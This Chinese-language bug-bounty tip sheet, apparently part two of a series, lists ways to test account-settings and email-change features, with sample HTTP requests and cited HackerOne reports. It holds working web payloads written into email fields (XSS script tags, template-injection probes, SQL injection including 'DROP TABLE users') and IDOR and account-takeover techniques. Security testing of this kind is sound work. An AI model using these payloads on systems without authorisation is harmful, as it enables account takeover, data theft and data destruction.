正文
本文为本系列的第二弹,前篇有:
第八种方法
如果目标的业务系统中有增加第二个邮箱的功能,尝试用公司邮箱添加,比如: any@company.com ,从而获得额外权限,
POST /setting HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number email=any@company.com&action=add&token=CSRF
第九种方法
如果目标的业务系统中有增加第二个邮箱的功能,尝试用公司邮箱添加,比如: any@gmail.com@company.com ,从而获得额外权限,
POST /setting HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number email=any@gmail.com@company.com&action=add& token=CSRF
第十种方法
如果目标的业务系统中有增加第二个邮箱的功能,尝试用Burp Collaborator邮箱地址,可能会获取后台敏感信息
me@id.collaborator.net user(;me@id.collaborator.net)@gmail.com me@id.collaborator.net(@gmail.com) me+(@gmail.com)@id.collaborator.net <me@id.collaborator.net>user@gmail.com
第十一种方法
如果目标的业务系统中有增加第二个邮箱的功能,尝试用以下的payload,可能会有xss,ssti,sqli在等着你发现
me+(<script>alert(0)</script>)@gmail.com me(<script>alert(0)</script>)@gmail.com me@gmail(<script>alert(0)</script>).com "<script>alert(0)</script>"@gmail.com "<%= 7 * 7 %>"@gmail.com me+(${{7*7}})@gmail.com "' OR 1=1 -- '"@gmail.com "me); DROP TABLE users;--"@gmail.com me@[id.collaborator.net] %@gmail.com
第十二种方法
如果有基于UUID的编辑,尝试使用另一个帐户的UUID,看看是否有IDOR
POST /setting HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number email=me@gmail.com&uuid=Your-UUID&token=CSRF
第十三种方法
将邮箱从Attacker@gmail.com更改为Victim@Gmail.com时,确认验证码是否也发送到Attacker@gmail.com,如果是,这里有账户劫持漏洞
POST /setting HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number newemail=victim@gmail.com&token=CSRF
第十四种方法
如果有基于手机号码的编辑功能,比如:修改密码,请尝试使用其他帐号的手机号码,测试是否有IDOR
POST /setting HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://previous.com/path Origin: https://www.company.com Content-Length: Number newPass=****&phone=Phone-Another-Account&token=CSRF
参考
https://hackerone.com/reports/565883
https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5
https://www.youtube.com/watch?v=cThFNXrBYQU
https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses
https://twitter.com/intigriti/status/1318532648734773249
https://www.youtube.com/watch?time_continue=12&v=cbJ4NSYsUto&feature=emb_logo
https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17
https://hackerone.com/reports/95552
https://hackerone.com/reports/950881
https://hackerone.com/reports/969223
https://hackerone.com/reports/974222
